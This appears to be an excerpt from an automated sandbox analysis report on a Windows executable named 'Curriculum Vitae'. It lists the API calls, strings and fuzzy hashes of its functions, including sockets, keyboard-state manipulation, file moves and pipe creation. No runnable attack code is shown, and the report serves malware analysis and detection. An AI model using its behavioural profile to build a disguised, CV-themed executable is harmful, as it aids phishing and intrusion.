                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00D8682C,00000004,00000000,00000000), ref: 00D4F953
                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00D8682C,00000004,00000000,00000000), ref: 00D8F3D1
                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00D8682C,00000004,00000000,00000000), ref: 00D8F454
                      Similarity
                      • API ID: ShowWindow
                      • String ID:
                      • API String ID: 1268545403-0
                      APIs
                      • DeleteObject.GDI32(00000000), ref: 00DC2D1B
                      • GetDC.USER32(00000000), ref: 00DC2D23
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DC2D2E
                      • ReleaseDC.USER32(00000000,00000000), ref: 00DC2D3A
                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00DC2D76
                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00DC2D87
                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00DC5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00DC2DC2
                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00DC2DE1
                      Similarity
                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                      • String ID:
                      • API String ID: 3864802216-0
                      APIs
                      Similarity
                      • API ID: _memcmp
                      • String ID:
                      • API String ID: 2931989736-0
                      Strings
                      Similarity
                      • API ID:
                      • String ID: NULL Pointer assignment$Not an Object type
                      • API String ID: 0-572801152
                      APIs
                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00D717FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00D715CE
                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00D717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00D71651
                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00D717FB,?,00D717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00D716E4
                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00D717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00D716FB
                        • Part of subcall function 00D63820: RtlAllocateHeap.NTDLL(00000000,?,00E01444,?,00D4FDF5,?,?,00D3A976,00000010,00E01440,00D313FC,?,00D313C6,?,00D31129), ref: 00D63852
                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00D717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00D71777
                      • __freea.LIBCMT ref: 00D717A2
                      • __freea.LIBCMT ref: 00D717AE
                      Similarity
                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                      • String ID:
                      • API String ID: 2829977744-0
                      APIs
                      Strings
                      Similarity
                      • API ID: Variant$ClearInit
                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                      • API String ID: 2610073882-625585964
                      APIs
                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00DA125C
                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00DA1284
                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00DA12A8
                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DA12D8
                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DA135F
                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DA13C4
                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DA1430
                      Similarity
                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                      • String ID:
                      • API String ID: 2550207440-0
                      Similarity
                      • API ID: ObjectSelect$BeginCreatePath
                      • String ID:
                      • API String ID: 3225163088-0
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 00DB396B
                      • CharUpperBuffW.USER32(?,?), ref: 00DB3A7A
                      • _wcslen.LIBCMT ref: 00DB3A8A
                      • VariantClear.OLEAUT32(?), ref: 00DB3C1F
                        • Part of subcall function 00DA0CDF: VariantInit.OLEAUT32(00000000), ref: 00DA0D1F
                        • Part of subcall function 00DA0CDF: VariantCopy.OLEAUT32(?,?), ref: 00DA0D28
                        • Part of subcall function 00DA0CDF: VariantClear.OLEAUT32(?), ref: 00DA0D34
                      Strings
                      Similarity
                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                      • API String ID: 4137639002-1221869570
                      APIs
                        • Part of subcall function 00D9000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D8FF41,80070057,?,?,?,00D9035E), ref: 00D9002B
                        • Part of subcall function 00D9000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D8FF41,80070057,?,?), ref: 00D90046
                        • Part of subcall function 00D9000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D8FF41,80070057,?,?), ref: 00D90054
                        • Part of subcall function 00D9000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D8FF41,80070057,?), ref: 00D90064
                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00DB4C51
                      • _wcslen.LIBCMT ref: 00DB4D59
                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00DB4DCF
                      • CoTaskMemFree.OLE32(?), ref: 00DB4DDA
                      Strings
                      Similarity
                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                      • String ID: NULL Pointer assignment
                      • API String ID: 614568839-2785691316
                      APIs
                      • GetMenu.USER32(?), ref: 00DC2183
                      • GetMenuItemCount.USER32(00000000), ref: 00DC21B5
                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00DC21DD
                      • _wcslen.LIBCMT ref: 00DC2213
                      • GetMenuItemID.USER32(?,?), ref: 00DC224D
                      • GetSubMenu.USER32(?,?), ref: 00DC225B
                        • Part of subcall function 00D93A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D93A57
                        • Part of subcall function 00D93A3D: GetCurrentThreadId.KERNEL32 ref: 00D93A5E
                        • Part of subcall function 00D93A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00D925B3), ref: 00D93A65
                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00DC22E3
                        • Part of subcall function 00D9E97B: Sleep.KERNEL32 ref: 00D9E9F3
                      Similarity
                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                      • String ID:
                      • API String ID: 4196846111-0
                      APIs
                      • GetParent.USER32(?), ref: 00D9AEF9
                      • GetKeyboardState.USER32(?), ref: 00D9AF0E
                      • SetKeyboardState.USER32(?), ref: 00D9AF6F
                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00D9AF9D
                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00D9AFBC
                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00D9AFFD
                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00D9B020
                      Similarity
                      • API ID: MessagePost$KeyboardState$Parent
                      • String ID:
                      • API String ID: 87235514-0
                      APIs
                      • GetParent.USER32(00000000), ref: 00D9AD19
                      • GetKeyboardState.USER32(?), ref: 00D9AD2E
                      • SetKeyboardState.USER32(?), ref: 00D9AD8F
                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00D9ADBB
                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00D9ADD8
                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00D9AE17
                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00D9AE38
                      Similarity
                      • API ID: MessagePost$KeyboardState$Parent
                      • String ID:
                      • API String ID: 87235514-0
                      APIs
                      • GetConsoleCP.KERNEL32(00D73CD6,?,?,?,?,?,?,?,?,00D65BA3,?,?,00D73CD6,?,?), ref: 00D65470
                      • __fassign.LIBCMT ref: 00D654EB
                      • __fassign.LIBCMT ref: 00D65506
                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00D73CD6,00000005,00000000,00000000), ref: 00D6552C
                      • WriteFile.KERNEL32(?,00D73CD6,00000000,00D65BA3,00000000,?,?,?,?,?,?,?,?,?,00D65BA3,?), ref: 00D6554B
                      • WriteFile.KERNEL32(?,?,00000001,00D65BA3,00000000,?,?,?,?,?,?,?,?,?,00D65BA3,?), ref: 00D65584
                      Similarity
                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                      • String ID:
                      • API String ID: 1324828854-0
                      APIs
                      • _ValidateLocalCookies.LIBCMT ref: 00D52D4B
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00D52D53
                      • _ValidateLocalCookies.LIBCMT ref: 00D52DE1
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00D52E0C
                      • _ValidateLocalCookies.LIBCMT ref: 00D52E61
                      Strings
                      Similarity
                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm
                      • API String ID: 1170836740-1018135373
                      • Opcode ID: ad2d4531a579b4944b80347806cf16773ff6c4774597a006ba7d0063ff0d272c
                      • Instruction ID: 16fa38e0210716b1ee399a97f4f118e8a965228061c5282818863207b855daba
                      • Opcode Fuzzy Hash: ad2d4531a579b4944b80347806cf16773ff6c4774597a006ba7d0063ff0d272c
                      • Instruction Fuzzy Hash: 78418734A00209ABCF14DF58C845AAE7BB5FF46365F188156ED145B352D7319A1DCBF0
                      APIs
                        • Part of subcall function 00DB304E: inet_addr.WSOCK32(?), ref: 00DB307A
                        • Part of subcall function 00DB304E: _wcslen.LIBCMT ref: 00DB309B
                      • socket.WSOCK32(00000002,00000001,00000006), ref: 00DB1112
                      • WSAGetLastError.WSOCK32 ref: 00DB1121
                      • WSAGetLastError.WSOCK32 ref: 00DB11C9
                      • closesocket.WSOCK32(00000000), ref: 00DB11F9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                      • String ID:
                      • API String ID: 2675159561-0
                      • Opcode ID: 376537540ba7923d4cdb488d32855c51c3a3b1ba17210309838e88d568b2b01c
                      • Instruction ID: 2de24239490f58268773d6d8a22a5e3d2548d7cbd5bdfcf0c98606aaefd2ae5f
                      • Opcode Fuzzy Hash: 376537540ba7923d4cdb488d32855c51c3a3b1ba17210309838e88d568b2b01c
                      • Instruction Fuzzy Hash: 6241E335600705EFDB109F18C894BEAB7E9EF453A4F588059FA4A9B291C770ED41CBB0
                      APIs
                        • Part of subcall function 00D9DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00D9CF22,?), ref: 00D9DDFD
                        • Part of subcall function 00D9DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00D9CF22,?), ref: 00D9DE16
                      • lstrcmpiW.KERNEL32(?,?), ref: 00D9CF45
                      • MoveFileW.KERNEL32(?,?), ref: 00D9CF7F
                      • _wcslen.LIBCMT ref: 00D9D005
                      • _wcslen.LIBCMT ref: 00D9D01B
                      • SHFileOperationW.SHELL32(?), ref: 00D9D061
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                      • String ID: \*.*
                      • API String ID: 3164238972-1173974218
                      • Opcode ID: ae50b212d003d5825afbf7196ce7fdbafcfd9c48a0f6d0fcbd1b9dee8469934c
                      • Instruction ID: c94e913d40ae8a2ea51aeb29d686da30646971e57fbb4d14a144f79307359189
                      • Opcode Fuzzy Hash: ae50b212d003d5825afbf7196ce7fdbafcfd9c48a0f6d0fcbd1b9dee8469934c
                      • Instruction Fuzzy Hash: E54146719462195FDF12EFA4D981EDDB7B9EF48380F1410E6E509EB141EA34A688CF70
                      APIs
                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00DC2E1C
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00DC2E4F
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00DC2E84
                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00DC2EB6
                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00DC2EE0
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00DC2EF1
                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00DC2F0B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: LongWindow$MessageSend
                      • String ID:
                      • API String ID: 2178440468-0
                      • Opcode ID: 451435d85727cae6413fd2d0ff420841ea532a632730864288cd6775344a70eb
                      • Instruction ID: 63ec0b3a791a8a0c75e66e63b65b9359e70cbb459e738e8a5a6046a6791122ba
                      • Opcode Fuzzy Hash: 451435d85727cae6413fd2d0ff420841ea532a632730864288cd6775344a70eb
                      • Instruction Fuzzy Hash: 553126306442569FDB21DF59DC84FA537E8FB9A710F1801A8FA04EF2B1CB71A884DB21
                      APIs
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D97769
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D9778F
                      • SysAllocString.OLEAUT32(00000000), ref: 00D97792
                      • SysAllocString.OLEAUT32(?), ref: 00D977B0
                      • SysFreeString.OLEAUT32(?), ref: 00D977B9
                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00D977DE
                      • SysAllocString.OLEAUT32(?), ref: 00D977EC
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                      • String ID:
                      • API String ID: 3761583154-0
                      • Opcode ID: 2e33b132015389ab3c76d0d4ddd76898c9f58336574c342e5f4ec24b2cf051e6
                      • Instruction ID: 96d33d2352c770059c9f033574063065381499fb73aaaef3391da9e0ca395149
                      • Opcode Fuzzy Hash: 2e33b132015389ab3c76d0d4ddd76898c9f58336574c342e5f4ec24b2cf051e6
                      • Instruction Fuzzy Hash: E521927661821AAFDF10DFE9CC88CBB77ACEB097647048025FA15DB260D670EC4187B0
                      APIs
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D97842
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D97868
                      • SysAllocString.OLEAUT32(00000000), ref: 00D9786B
                      • SysAllocString.OLEAUT32 ref: 00D9788C
                      • SysFreeString.OLEAUT32 ref: 00D97895
                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00D978AF
                      • SysAllocString.OLEAUT32(?), ref: 00D978BD
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                      • String ID:
                      • API String ID: 3761583154-0
                      • Opcode ID: ed2dad96aba4e94139e9c5ec530211f5a1e8eb99c7ea6a9a0f5d51408ad4ab92
                      • Instruction ID: 2ee49faed0c6815ac14a9e2db22c5f533dab60134b7b87c1b989a950b8b2acbe
                      • Opcode Fuzzy Hash: ed2dad96aba4e94139e9c5ec530211f5a1e8eb99c7ea6a9a0f5d51408ad4ab92
                      • Instruction Fuzzy Hash: 44217131618205AFDF10AFE8DC88DAA77ECFB097607148125FA15CB2A1D670EC41CB74
                      APIs
                      • GetStdHandle.KERNEL32(0000000C), ref: 00DA04F2
                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DA052E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CreateHandlePipe
                      • String ID: nul
                      • API String ID: 1424370930-2873401336
                      • Opcode ID: 2a00fe98bc53af3bbae4690521a2cd02ec6d83b5ea9a341330ce7b013f8e6c73
                      • Instruction ID: 45d9e4cbb346b45638ecb4652d40c0ed12470cd2f37ca3716939465b3acebc2b
                      • Opcode Fuzzy Hash: 2a00fe98bc53af3bbae4690521a2cd02ec6d83b5ea9a341330ce7b013f8e6c73
                      • Instruction Fuzzy Hash: 4C218B71900306AFDF209F69DC44A9ABFB4AF46764F244A19F9A1D62E0E770D950CF30
                      APIs
                      • GetStdHandle.KERNEL32(000000F6), ref: 00DA05C6
                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DA0601
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CreateHandlePipe
                      • String ID: nul
                      • API String ID: 1424370930-2873401336
                      • Opcode ID: 479ef5d27a8d05c94aad6fc970d6abad5719b0db11171806f35c39d446625143
                      • Instruction ID: f6a63381afa245a326b4c27c2218faf67c258d07fc1eefa09491d8184bb0ff39
                      • Opcode Fuzzy Hash: 479ef5d27a8d05c94aad6fc970d6abad5719b0db11171806f35c39d446625143
                      • Instruction Fuzzy Hash: 112165755003069FDB209F69DC04E5A7BE4BF96724F280A19F9A1E72D0E770D960CB70
                      APIs
                        • Part of subcall function 00D3600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D3604C
                        • Part of subcall function 00D3600E: GetStockObject.GDI32(00000011), ref: 00D36060
                        • Part of subcall function 00D3600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D3606A
                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00DC4112
                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00DC411F
                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00DC412A
                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00DC4139
                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00DC4145
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$CreateObjectStockWindow
                      • String ID: Msctls_Progress32
                      • API String ID: 1025951953-3636473452
                      • Opcode ID: 0a115bcd92523c2a988ba6939be27ddc0fd1f20328331c33cb97a56cb8bf52c1
                      • Instruction ID: cdf1c123935825d5f64b37f81b30e638099c1a49a4da461275545a7939aaadca
                      • Opcode Fuzzy Hash: 0a115bcd92523c2a988ba6939be27ddc0fd1f20328331c33cb97a56cb8bf52c1
                      • Instruction Fuzzy Hash: 5B1190B215021ABEEF118F64CC86EE77F9DEF08798F018111FB58A6150C672DC619BB4
                      APIs
                        • Part of subcall function 00D6D7A3: _free.LIBCMT ref: 00D6D7CC
                      • _free.LIBCMT ref: 00D6D82D
                        • Part of subcall function 00D629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000), ref: 00D629DE
                        • Part of subcall function 00D629C8: GetLastError.KERNEL32(00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000,00000000), ref: 00D629F0
                      • _free.LIBCMT ref: 00D6D838
                      • _free.LIBCMT ref: 00D6D843
                      • _free.LIBCMT ref: 00D6D897
                      • _free.LIBCMT ref: 00D6D8A2
                      • _free.LIBCMT ref: 00D6D8AD
                      • _free.LIBCMT ref: 00D6D8B8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                      • Instruction ID: c50fb5f14624c33c03f07dae5e05c4573e4387a91d28e75e31199b8ce8a3ce9b
                      • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                      • Instruction Fuzzy Hash: 71115E71B80B04ABD621BFB0DC47FDB7BDDEF40700F440826B29AA6092DB75B5058A71
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00D9DA74
                      • LoadStringW.USER32(00000000), ref: 00D9DA7B
                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00D9DA91
                      • LoadStringW.USER32(00000000), ref: 00D9DA98
                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00D9DADC
                      Strings
                      • %s (%d) : ==> %s: %s %s, xrefs: 00D9DAB9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: HandleLoadModuleString$Message
                      • String ID: %s (%d) : ==> %s: %s %s
                      • API String ID: 4072794657-3128320259
                      • Opcode ID: de4b73fd31a9adfbcb1eb767904d7050dac577a714f7ceb3367e88057da2d6a1
                      • Instruction ID: 7e912bbefb13599e0a23cec177888a8f36ac8f25438ae580f2e7933b1f88a4c0
                      • Opcode Fuzzy Hash: de4b73fd31a9adfbcb1eb767904d7050dac577a714f7ceb3367e88057da2d6a1
                      • Instruction Fuzzy Hash: F50186F25103097FEB10ABA49D89EF7736CE708301F405495F74AE2141EA749E844F74
                      APIs
                      • InterlockedExchange.KERNEL32(016DF320,016DF320), ref: 00DA097B
                      • EnterCriticalSection.KERNEL32(016DF300,00000000), ref: 00DA098D
                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 00DA099B
                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00DA09A9
                      • CloseHandle.KERNEL32(00000000), ref: 00DA09B8
                      • InterlockedExchange.KERNEL32(016DF320,000001F6), ref: 00DA09C8
                      • LeaveCriticalSection.KERNEL32(016DF300), ref: 00DA09CF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
